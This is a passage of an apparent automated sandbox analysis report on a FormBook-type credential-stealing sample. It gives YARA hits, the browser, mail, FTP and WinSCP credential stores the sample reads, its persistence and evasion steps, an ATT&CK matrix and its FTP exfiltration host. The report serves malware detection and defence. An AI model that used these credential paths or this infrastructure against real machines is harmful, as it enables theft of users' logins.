                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Users\user\AppData\Roaming\GedTanqRR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2977002334.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2977044627.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2976437638.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2978687835.000000000335C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2977044627.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2976437638.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2978687835.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7948, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 8088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 7436, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 5472, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2977044627.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2976437638.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2978687835.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7948, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 8088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 7436, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 5472, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 15.2.sgxIb.exe.505fdb0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c3d218.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4aceda0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4a92580.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c79a38.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.5023590.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4aceda0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.5023590.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c79a38.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.s2Jg1MAahY.exe.4a92580.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.GedTanqRR.exe.4c3d218.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.sgxIb.exe.505fdb0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2977002334.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1773872051.0000000004A92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2977044627.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2976437638.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2978687835.000000000335C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2977044627.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2976437638.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2978687835.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: s2Jg1MAahY.exe PID: 7948, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 8088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GedTanqRR.exe PID: 7436, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 7960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 5472, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    112
                    Process Injection
                    3
                    Obfuscated Files or Information
                    11
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    1
                    Registry Run Keys / Startup Folder
                    1
                    Scheduled Task/Job
                    2
                    Software Packing
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder
                    1
                    DLL Side-Loading
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model11
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Masquerading
                    LSA Secrets2
                    Process Discovery
                    SSH1
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
                    Process Injection
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Hidden Files and Directories
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587906 Sample: s2Jg1MAahY.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 65 ftp.haliza.com.my 2->65 67 api.ipify.org 2->67 73 Suricata IDS alerts for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 10 other signatures 2->79 8 s2Jg1MAahY.exe 7 2->8         started        12 GedTanqRR.exe 2->12         started        14 sgxIb.exe 2->14         started        16 sgxIb.exe 2->16         started        signatures3 process4 file5 57 C:\Users\user\AppData\RoamingbehaviorgraphedTanqRR.exe, PE32 8->57 dropped 59 C:\Users\...behaviorgraphedTanqRR.exe:Zone.Identifier, ASCII 8->59 dropped 61 C:\Users\user\AppData\Local\...\tmpF8DD.tmp, XML 8->61 dropped 63 C:\Users\user\AppData\...\s2Jg1MAahY.exe.log, ASCII 8->63 dropped 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 8->97 99 Adds a directory exclusion to Windows Defender 8->99 18 s2Jg1MAahY.exe 16 5 8->18         started        23 powershell.exe 22 8->23         started        35 2 other processes 8->35 101 Antivirus detection for dropped file 12->101 103 Multi AV Scanner detection for dropped file 12->103 105 Machine Learning detection for dropped file 12->105 25 GedTanqRR.exe 12->25         started        27 schtasks.exe 12->27         started        107 Injects a PE file into a foreign processes 14->107 29 sgxIb.exe 14->29         started        37 2 other processes 14->37 31 sgxIb.exe 16->31         started        33 schtasks.exe 16->33         started        signatures6 process7 dnsIp8 69 ftp.haliza.com.my 110.4.45.197, 21, 49158, 49476 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 18->69 71 api.ipify.org 104.26.12.205, 443, 49735, 49742 CLOUDFLARENETUS United States 18->71 53 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 18->53 dropped 55 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 18->55 dropped 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->81 83 Tries to steal Mail credentials (via file / registry access) 18->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->85 87 Loading BitLocker PowerShell Module 23->87 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        43 conhost.exe 27->43         started        89 Tries to harvest and steal ftp login credentials 31->89 91 Tries to harvest and steal browser information (history, passwords, etc) 31->91 93 Installs a global keyboard hook 31->93 45 conhost.exe 33->45         started        47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        51 conhost.exe 37->51         started        file9 signatures10 process11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    s2Jg1MAahY.exe69%VirustotalBrowse
                    s2Jg1MAahY.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    s2Jg1MAahY.exe100%AviraHEUR/AGEN.1350994
                    s2Jg1MAahY.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%AviraHEUR/AGEN.1350994
                    C:\Users\user\AppData\Roaming\GedTanqRR.exe100%AviraHEUR/AGEN.1350994
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\GedTanqRR.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\GedTanqRR.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe79%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c0%Avira URL Cloudsafe
                    http://ftp.haliza.com.my100%Avira URL Cloudmalware
                    https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    104.26.12.205
                    truefalse
                      high
                      ftp.haliza.com.my
                      110.4.45.197
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0s2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.coms2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGs2Jg1MAahY.exe, 00000000.00000002.1780417173.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
